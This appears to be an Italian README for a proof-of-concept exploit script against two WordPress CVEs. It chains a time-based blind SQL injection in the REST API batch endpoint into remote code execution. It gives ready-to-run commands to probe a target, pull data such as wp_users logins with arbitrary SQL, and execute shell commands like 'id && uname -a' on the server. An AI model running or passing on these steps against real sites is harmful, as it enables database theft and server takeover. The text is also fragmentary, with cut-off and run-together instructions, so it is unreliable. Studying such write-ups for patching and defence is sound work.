
CVE-2026-63030 & CVE-2026-60137 Wp2shell Poc
poc_wp_tot.py è un proof‑of‑concept (PoC) per sfruttare la vulnerabilità
di blind SQL injection basata sul tempo nell'endpoint batch delle WordPress REST API,
ed eseguire una catena di escalation fino alla Remote Code Execution (RCE).
poc_wp_tot.py nella tua directory di lavoro.python3 -m venv venv
source venv/bin/activate

Lo script fornisce tre modalità operative: probe (rilevamento), extract (recupero dati) e rce (esecuzione comandi). Ecco alcuni esempi di utilizzo.
python3 poc_wp_tot.py https://target.example.com/
python3 poc_wp_tot.py -v https://target.example.com/ "SELECT user_login FROM wp_users LIMIT 1"
python3 poc_wp_tot.py https://target.example.com/ -c "id && uname -a"
-h, --help: Mostra il messaggio di aiuto-v, --verbose: Attiva l'output verbose (debug)-c <COMMAND>: Modalità RCE — esegue un comando shell sul targetSLEEP() sul server target
come condizione booleana (blind SQLi basata sul tempo).poc_wp_tot.py.calibrate(), get_scalar()
e exploit_rce() nello script.